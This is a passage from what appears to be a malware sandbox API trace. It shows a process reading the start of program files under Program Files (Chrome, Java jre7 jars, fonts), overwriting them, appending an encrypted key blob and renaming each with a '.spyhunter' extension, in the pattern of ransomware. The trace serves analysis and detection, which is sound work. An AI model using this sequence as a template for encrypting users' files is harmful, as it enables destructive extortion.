hFile=0x17c, liDistanceToMove=0xffffe548, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.600] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1ab8, lpNumberOfBytesWritten=0x248f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f7c4*=0x1ab8, lpOverlapped=0x0) returned 1 [0123.600] GetProcessHeap () returned 0x2c0000 [0123.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0123.600] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.601] WriteFile (in: hFile=0x17c, lpBuffer=0x248f804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7c4, lpOverlapped=0x0 | out: lpBuffer=0x248f804*, lpNumberOfBytesWritten=0x248f7c4*=0x4, lpOverlapped=0x0) returned 1 [0123.601] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7c4*=0x30, lpOverlapped=0x0) returned 1 [0123.601] CloseHandle (hObject=0x17c) returned 1 [0123.601] GetProcessHeap () returned 0x2c0000 [0123.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.601] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma.spyhunter") returned 94 [0123.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\20170605115313.pma.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\20170605115313.pma.spyhunter")) returned 1 [0123.602] GetProcessHeap () returned 0x2c0000 [0123.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.602] GetProcessHeap () returned 0x2c0000 [0123.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.602] GetProcessHeap () returned 0x2c0000 [0123.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca0c8 | out: hHeap=0x2c0000) returned 1 [0123.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f800 | out: pbBuffer=0x248f800) returned 1 [0123.602] GetProcessHeap () returned 0x2c0000 [0123.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7f8*=0x30) returned 1 [0123.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.604] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT") returned 46 [0123.604] StrStrW (lpFirst="COPYRIGHT", lpSrch=".txt") returned 0x0 [0123.604] GetProcessHeap () returned 0x2c0000 [0123.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0123.604] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f7bc*=0xd51, lpOverlapped=0x0) returned 1 [0123.885] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffff2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0123.886] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd51, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f7bc*=0xd51, lpOverlapped=0x0) returned 1 [0123.886] GetProcessHeap () returned 0x2c0000 [0123.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0123.886] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.886] WriteFile (in: hFile=0x17c, lpBuffer=0x248f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x248f7fc*, lpNumberOfBytesWritten=0x248f7bc*=0x4, lpOverlapped=0x0) returned 1 [0123.886] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7bc*=0x30, lpOverlapped=0x0) returned 1 [0123.886] CloseHandle (hObject=0x17c) returned 1 [0123.886] GetProcessHeap () returned 0x2c0000 [0123.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0123.886] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.spyhunter") returned 56 [0123.886] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\COPYRIGHT.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\copyright.spyhunter")) returned 1 [0123.895] GetProcessHeap () returned 0x2c0000 [0123.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0123.895] GetProcessHeap () returned 0x2c0000 [0123.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0123.895] GetProcessHeap () returned 0x2c0000 [0123.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d930 | out: hHeap=0x2c0000) returned 1 [0123.895] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f800 | out: pbBuffer=0x248f800) returned 1 [0123.896] GetProcessHeap () returned 0x2c0000 [0123.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0123.896] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7f8*=0x30) returned 1 [0123.896] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0123.896] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe") returned 54 [0123.896] StrStrW (lpFirst="unpack200.exe", lpSrch=".txt") returned 0x0 [0123.896] GetProcessHeap () returned 0x2c0000 [0123.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0123.897] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f7bc*=0x2800, lpOverlapped=0x0) returned 1 [0124.135] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0124.135] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f7bc*=0x2800, lpOverlapped=0x0) returned 1 [0124.279] GetProcessHeap () returned 0x2c0000 [0124.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0124.279] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.279] WriteFile (in: hFile=0x17c, lpBuffer=0x248f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x248f7fc*, lpNumberOfBytesWritten=0x248f7bc*=0x4, lpOverlapped=0x0) returned 1 [0124.323] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7bc*=0x30, lpOverlapped=0x0) returned 1 [0124.323] CloseHandle (hObject=0x17c) returned 1 [0124.713] GetProcessHeap () returned 0x2c0000 [0124.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0124.714] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe.spyhunter") returned 64 [0124.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe.spyhunter")) returned 1 [0124.714] GetProcessHeap () returned 0x2c0000 [0124.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0124.715] GetProcessHeap () returned 0x2c0000 [0124.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0124.715] GetProcessHeap () returned 0x2c0000 [0124.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3650 | out: hHeap=0x2c0000) returned 1 [0124.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7f8 | out: pbBuffer=0x248f7f8) returned 1 [0124.715] GetProcessHeap () returned 0x2c0000 [0124.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0124.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7f0*=0x30) returned 1 [0124.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0124.741] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar") returned 48 [0124.741] StrStrW (lpFirst="jce.jar", lpSrch=".txt") returned 0x0 [0124.741] GetProcessHeap () returned 0x2c0000 [0124.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0124.741] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f7b4*=0x2800, lpOverlapped=0x0) returned 1 [0125.303] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.303] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f7b4*=0x2800, lpOverlapped=0x0) returned 1 [0125.303] GetProcessHeap () returned 0x2c0000 [0125.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.303] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.303] WriteFile (in: hFile=0xec, lpBuffer=0x248f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x248f7f4*, lpNumberOfBytesWritten=0x248f7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.317] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.317] CloseHandle (hObject=0xec) returned 1 [0125.318] GetProcessHeap () returned 0x2c0000 [0125.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.318] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.spyhunter") returned 58 [0125.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\jce.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jce.jar.spyhunter")) returned 1 [0125.318] GetProcessHeap () returned 0x2c0000 [0125.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.318] GetProcessHeap () returned 0x2c0000 [0125.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0125.319] GetProcessHeap () returned 0x2c0000 [0125.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3de0 | out: hHeap=0x2c0000) returned 1 [0125.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7f8 | out: pbBuffer=0x248f7f8) returned 1 [0125.319] GetProcessHeap () returned 0x2c0000 [0125.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0125.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7f0*=0x30) returned 1 [0125.319] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0125.319] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf") returned 68 [0125.319] StrStrW (lpFirst="LucidaSansRegular.ttf", lpSrch=".txt") returned 0x0 [0125.319] GetProcessHeap () returned 0x2c0000 [0125.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0125.319] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f7b4*=0x2800, lpOverlapped=0x0) returned 1 [0125.358] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.359] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f7b4*=0x2800, lpOverlapped=0x0) returned 1 [0125.359] GetProcessHeap () returned 0x2c0000 [0125.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0125.359] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.359] WriteFile (in: hFile=0xec, lpBuffer=0x248f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x248f7f4*, lpNumberOfBytesWritten=0x248f7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.459] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.459] CloseHandle (hObject=0xec) returned 1 [0125.459] GetProcessHeap () returned 0x2c0000 [0125.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.459] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.spyhunter") returned 78 [0125.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaSansRegular.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidasansregular.ttf.spyhunter")) returned 1 [0125.460] GetProcessHeap () returned 0x2c0000 [0125.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.460] GetProcessHeap () returned 0x2c0000 [0125.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0125.460] GetProcessHeap () returned 0x2c0000 [0125.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cf60 | out: hHeap=0x2c0000) returned 1 [0125.460] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7f0 | out: pbBuffer=0x248f7f0) returned 1 [0125.460] GetProcessHeap () returned 0x2c0000 [0125.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0125.460] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7e8*=0x30) returned 1 [0125.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0125.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar") returned 54 [0125.462] StrStrW (lpFirst="resources.jar", lpSrch=".txt") returned 0x0 [0125.462] GetProcessHeap () returned 0x2c0000 [0125.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0125.462] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f7ac*=0x2800, lpOverlapped=0x0) returned 1 [0125.622] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.622] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f7ac*=0x2800, lpOverlapped=0x0) returned 1 [0125.622] GetProcessHeap () returned 0x2c0000 [0125.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0125.622] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.623] WriteFile (in: hFile=0xec, lpBuffer=0x248f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x248f7ec*, lpNumberOfBytesWritten=0x248f7ac*=0x4, lpOverlapped=0x0) returned 1 [0127.036] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7ac*=0x30, lpOverlapped=0x0) returned 1 [0127.037] CloseHandle (hObject=0xec) returned 1 [0127.037] GetProcessHeap () returned 0x2c0000 [0127.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.037] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.spyhunter") returned 64 [0127.037] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\resources.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\resources.jar.spyhunter")) returned 1 [0127.038] GetProcessHeap () returned 0x2c0000 [0127.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.038] GetProcessHeap () returned 0x2c0000 [0127.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0127.038] GetProcessHeap () returned 0x2c0000 [0127.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f267f0 | out: hHeap=0x2c0000) returned 1 [0127.038] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f7f0 | out: pbBuffer=0x248f7f0) returned 1 [0127.038] GetProcessHeap () returned 0x2c0000 [0127.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0127.038] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f7e8*=0x30) returned 1 [0127.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0127.040] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf") returned 71 [0127.040] StrStrW (lpFirst="LucidaBrightDemiBold.ttf", lpSrch=".txt") returned 0x0 [0127.040] GetProcessHeap () returned 0x2c0000 [0127.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0127.040] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f7ac*=0x2800, lpOverlapped=0x0) returned 1 [0127.201] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.201] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f7ac*=0x2800, lpOverlapped=0x0) returned 1 [0127.201] GetProcessHeap () returned 0x2c0000 [0127.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0127.202] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.202] WriteFile (in: hFile=0xec, lpBuffer=0x248f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x248f7ec*, lpNumberOfBytesWritten=0x248f7ac*=0x4, lpOverlapped=0x0) returned 1 [0127.295] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f7ac*=0x30, lpOverlapped=0x0) returned 1 [0127.295] CloseHandle (hObject=0xec) returned 1 [0127.296] GetProcessHeap () returned 0x2c0000 [0127.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f067d8 [0127.296] wnsprintfW (in: pszDest=0x2f067d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.spyhunter") returned 81 [0127.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\fonts\\LucidaBrightDemiBold.ttf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\fonts\\lucidabrightdemibold.ttf.spyhunter")) returned 1 [0127.297] 